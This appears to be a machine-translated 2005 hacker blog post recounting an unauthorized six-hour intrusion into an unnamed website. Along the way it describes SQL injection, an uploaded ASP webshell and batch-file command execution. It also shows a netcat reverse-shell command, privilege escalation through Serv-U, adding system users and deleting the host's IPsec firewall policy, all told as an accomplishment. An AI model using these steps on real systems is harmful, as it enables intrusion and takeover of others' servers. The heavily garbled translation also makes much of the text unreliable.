Article author: kEvin1986 Source: kEvin1986's BloG Published: 2005-02-24 10:12:33
Note: This article has been published in the second phase of "hacker X file" 2005. Reprinted, please indicate a hard six hours of penetration process, these days have always been confused, thinking that they have not been exercised in actual combat for a long time. So I just found a site, deep suction: penetration begins. On the side of the SUPERSCAN scan port, turn around at the site, discovers the vulnerabilities of SQL injection, is the MSSQL database, but it is impossible to succeed, probably the ASP's writing and the injection statement I use, so I The NBSI2 was sacrificed, and left and right, found that there were no discovery points. After the guess, I couldn't find the db_owner user. I didn't have any permissions. I guess it, I found a manage_user table, I got a few Administrator users. Then add an admin after the URL, actually jump out of the background management. So the username and password written on the write is successful. Everything seems smoothly and natural. At this time, the SUPERSCAN scan results came out. Only an 80-port is opened. It is estimated to do TCP / IP screening. This is a good solution, huh, huh. In the background, I saw a page of uploading the file. I tried uploaded an ASP program. I have waited for a few seconds. I actually prompt success! I will have a god. At this time, I am very easy to enter this site. It is probably nothing to penetrate, and I will give up to find another machine. But when I browse this site's C drive, I found the administrator actually did it. Permission setting, (Figure 1). 嘿 ~ I think about this site is fun, I want to win what he mean. In ASP Trojan, I found that the setting of this host is still more metamorphosis: C disk D disk E There is no way to browse, the F disk is where the web page is stored. The permissions of the settings look like EVERYONE, and then look at it carefully. The administrator prohibits WSH, it seems that the executive should be a bit trouble. However, at least one thing makes me feel happy is that there is FSO and a disk to use, self-feeling is still quite good. Now there is WebShell, I started to improve the permissions, I plan to use the Haiyang 2005 search function to search for SQL users and passwords under the F disc, but find a few sites for the conn.asp file, discover the original SQL and Not connected to this machine, but a remote host, and then say it is not sysadmin user, and it is not used. Hey, this is so embarrassed, I want to improve the permissions. I tried to try shell.application, and the discovery program is capable of executing, but can not add parameters to return the result. It seems that there is nothing to use. Later, I realized that such a weak idea hurts me to take a lot of detours. Penetration Here I feel a bit trouble, so I called LCX on QQ and to discuss the solution. After LCX, I learned that the host's settings, I told me to write a batch to write a command. As for the result, it can be used in the file used to the F: / under the F: / lower file. See here, I take the brain: I don't think it? First, use the Haiyang 2005assp Trojan to build a BAT file in F: /. Think about how can you at least take a look at the system's users. So write net user >> f: /a.txt and then use shell.Application to do it , Return to the FSO page to refresh, 诶? Why didn't you generate a.txt? Probably the administrator set up the account of the user without accessing cmd.exe. So I uploaded a cmd.exe to F: I uploaded from my own machine. / Here and write F: / cd.exe / c net user >> f: /a.txt. After execution, there is more A.txt under F: / disk, it seems that my guess is not wrong. Look at it The administrator uses the policy group to change the BT level, no way, and then look at what the port has been opened, and found that the host has opened 21 and 3389 except for the 80-port. It is the top of this 21-port. Is there anyone connected? No way? What am I not swept? So try to log in to FTP and the result is refused. Strange.
I can't do it on the front, even if you do TCP / IP screening, you are also doing this unit, and you can't do it. Well, pass a NC and then modify the BAT file: f: /nc.exe myip 1986 -ef: /cmd.exe, after executing, I will do the shell before the computer, etc., but etc. There is no reflection on the NC's monitoring port. by! Is it a legendary hardware firewall? It seems that it seems to be. Look at the list of ports without helpless, found 127.0.0.1 This port corresponds to the 43958 port (Figure 2). Yep? Is this not a local management port of Serv-U? Just there is a servu permission to improve the tool, just send a simple implementation of the command to add NT users, then look at it, and then succeed. Nice. So now let's take a look at the disc of the set permissions. After several execution, the result was destroyed again, and the administrator also banned the System users, tried to try CaCls, and still don't work. Really depressed. Now the permissions are available, but there is no port. There is no other thing, you can control it, really want to cry without tears. At this time, LCX gave me a prompt to say that I can use VIDC to come over or Hacker's Door. I finally passed the things for a long time, but the foundation was successful, and the VIDC couldn't even succeed. Good Guy, it's a difficult seed. I have played a two-year-semi-safe first encountered such BT host. I really want to give up. At first glance, in the past four hours, in addition to the permissions can improve the other, there is no progress, or you still look at what is good on this F disk. With a little desperate color, I opened another directory, but I was so bored to find a good thing. There is a "Farm Server Security Configuration. IPSec" on the host. What is this ipsec file, is it the IP security policy file? This host will not be used by IP strategies. Think about it is quite possible, hurry to download this file to the local, add a management unit to mmc.exe, add an IP security policy, import this file: Ha! Sure enough, I'm called "company "The security strategy has appeared (Figure 3), then the one layer opened him, found that it is really BT, let me be full of eyes, I have filtered from Syn to ICMP. I have learned a lot. Oh, I have studied this document, I started to guess the other party's host also assigned such a security policy? Delete him, then this host is in the network. Ha ha. Hurdish a Windows 200 Resource Kit on this machine, then extracted the ipsecpol.exe, ipsecutil.dll, and text2pol.dll to this host. These three files are tools for operating IPsec in the command, we only use it to delete this security assignment. Edit the BAT file with the serv-u permission tool to execute this command: IPsecpol -w reg -p "Company" -o, if this is not out, this security policy named "company" has been deleted. So the only job now to do is to restart the system and log in from the terminal service. what! The more you want to be more happy, finally edit the BAT file, use the Iisreset / Reboot command, and then execute. After a long time, there is no way to visit, it seems to be restarted. Excited ING.
